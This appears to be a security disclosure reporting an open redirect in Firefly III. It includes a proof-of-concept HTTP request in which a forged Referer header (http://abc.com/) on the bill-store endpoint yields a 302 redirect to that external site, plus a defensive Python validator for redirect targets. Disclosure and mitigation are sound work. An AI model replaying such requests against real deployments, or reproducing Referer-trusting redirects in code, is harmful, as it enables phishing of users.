Open Redirect in firefly-iii/firefly-iii
Reported on
Oct 1st 2021
Steps:
- Log in to the application, navigate to the bill section, create a bill, and capture the request.
Web applications use different techniques to redirect users to the next page: a URL query parameter, a header value, JavaScript code, or server-side logic. In this application, the value of the “Referer” header was used as the target of the redirect to the next page, so a request carrying an attacker-chosen Referer produces a 302 to that external site.
Original Request:
POST /bills/store HTTP/1.1
Host: demo.firefly-iii.org
.
.
.
Original Response:
HTTP/1.1 302 Found
location: https://demo.firefly-iii.org/bills/create
.
.
.
Modified Request:
POST /bills/store HTTP/1.1
Host: demo.firefly-iii.org
Referer: http://abc.com/
.
.
.
Modified Response:
HTTP/1.1 302 Found
location: http://abc.com/
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://abc.com/'" />
<title>Redirecting to http://abc.com/</title>
</head>
<body>
Redirecting to <a href="http://abc.com/">http://abc.com/</a>.
</body>
</html>
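One way to validate a Referer-derived redirect target before emitting the Location header, as an added example that is not code from the Firefly III project: only same-host http(s) URLs are honoured and the local path is re-emitted, everything else falls back to the fixed path seen in the original response. The function name, the request_host parameter and the sample inputs are assumptions for illustration.

```python
from typing import Optional
from urllib.parse import urlsplit

# Fallback taken from the page's original response: the path the app
# redirected to when the Referer was not attacker-controlled.
DEFAULT_AFTER_STORE = "/bills/create"


def safe_redirect_target(referer: Optional[str], request_host: str,
                         fallback: str = DEFAULT_AFTER_STORE) -> str:
    """Return a local redirect path derived from the Referer header only
    when it points back into this application, otherwise the fallback.

    request_host is the Host the request was actually served on
    (e.g. "demo.firefly-iii.org"); an attacker controls only the Referer.
    """
    if not referer:
        return fallback
    # Browsers treat backslashes as slashes; reject rather than guess
    # how every client will parse such a value.
    if "\\" in referer:
        return fallback
    try:
        parts = urlsplit(referer)
    except ValueError:
        return fallback
    # Scheme-relative ("//abc.com/") values have an empty scheme, and
    # javascript:/data: values have a non-http scheme: both are rejected.
    if parts.scheme not in ("http", "https"):
        return fallback
    # Compare the parsed hostname (lowercased by urlsplit, userinfo
    # stripped) against the host we are serving, ignoring any port.
    expected_host = request_host.split(":")[0].lower()
    if parts.hostname is None or parts.hostname != expected_host:
        return fallback
    # Re-emit only the local part so the Location header is never an
    # absolute URL assembled from attacker input.
    path = parts.path or "/"
    if not path.startswith("/"):
        return fallback
    return path + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    # Constructed inputs mirroring the page's modified and original requests.
    print(safe_redirect_target("http://abc.com/", "demo.firefly-iii.org"))
    print(safe_redirect_target("https://demo.firefly-iii.org/bills/create",
                               "demo.firefly-iii.org"))
```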